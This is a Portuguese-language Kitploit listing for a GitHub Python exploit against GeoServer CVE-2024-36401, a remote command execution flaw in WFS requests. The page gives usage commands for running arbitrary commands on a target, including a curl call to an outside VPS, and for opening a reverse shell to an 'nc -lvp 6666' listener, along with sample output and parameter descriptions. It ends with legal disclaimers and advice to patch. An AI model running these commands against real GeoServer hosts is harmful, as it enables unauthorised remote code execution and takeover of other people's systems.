Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36401 — Um exploit em Python para 'GeoServer' | Kitploit
Ferramentas/GitHubGitHub/urjack2025/cve-2024-36401
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

Um exploit em Python para 'GeoServer'

Ver Repositório
21há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-36401 Ferramenta de Exploração de Vulnerabilidade GeoServer

Resumo da Vulnerabilidade

CVE-2024-36401 é uma vulnerabilidade de execução remota de comandos no GeoServer, onde um atacante pode executar comandos arbitrários sem autorização ao construir solicitações WFS (Web Feature Service) específicas.

Requisitos de Ambiente

  • Python 3.x
  • Instalar dependências necessárias: pip install requests

Como Usar

Esta ferramenta suporta dois modos de uso: modo cmd (execução direta de comandos) e modo reverse (estabelecimento de shell reversa).

1. Testar se o alvo tem acesso à rede externa

Supondo que o endereço VPS seja 111.46.112.85, use o modo para executar o comando curl e testar se o servidor alvo pode acessar a rede externa:

Baixar ferramenta
cmd
root@kitploit:~
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

Método de verificação: Inicie um servidor HTTP no VPS para receber solicitações

root@kitploit:~
# 在 VPS 上执行
python -m http.server 8090

Se receber com sucesso as informações de retorno, verá uma saída semelhante à seguinte:

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. Estabelecer conexão de shell reversa

Use o modo reverse para estabelecer uma conexão de shell reversa com o VPS e porta especificados:

Passo 1: Configure uma porta de escuta no VPS

root@kitploit:~
# 在 VPS 上执行
nc -lvp 6666

Passo 2: Execute a ferramenta de exploração para iniciar a conexão reversa

root@kitploit:~
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

Após a execução, a ferramenta exibirá uma saída semelhante à seguinte:

root@kitploit:~
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

Neste momento, se a exploração for bem-sucedida, a escuta nc no VPS receberá uma sessão de shell reversa.

Descrição dos Parâmetros da Ferramenta

root@kitploit:~
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: Modo de execução de comando único
  • reverse: Modo de shell reversa
  • <target>: Endereço e porta do servidor alvo, no formato ip:porta
  • <command>: Comando a ser executado no servidor alvo
  • <vps_ip>: Endereço IP do servidor VPS
  • <vps_port>: Número da porta de escuta no VPS

Princípio da Vulnerabilidade

Esta vulnerabilidade explora uma falha de segurança no serviço WFS do GeoServer, executando comandos do sistema ao injetar código Java no valueReference. A ferramenta constrói um payload XML contendo código malicioso e o envia para a interface WFS do GeoServer, realizando assim a execução remota de comandos.

Avisos

  1. Esta ferramenta destina-se apenas a pesquisas de segurança e verificação de vulnerabilidades. Não a utilize para testes não autorizados.
  2. Quaisquer consequências resultantes do uso desta ferramenta são de responsabilidade do usuário.
  3. Ao usar a funcionalidade de shell reversa, certifique-se de ter permissão para acessar o sistema alvo e operar dentro dos limites permitidos pelas leis e regulamentos aplicáveis.
  4. Se for um ambiente de teste em campo de tiro, o organizador pode modificar algumas rotas padrão para aumentar a dificuldade, tornando o EXP inutilizável. Nesse caso, pode ser necessário ajustar o campo /geoserver/wfs para o conteúdo correspondente.

Recomendações de Correção

Atualize o GeoServer para a versão de segurança oficial mais recente e configure o servidor seguindo as melhores práticas de segurança.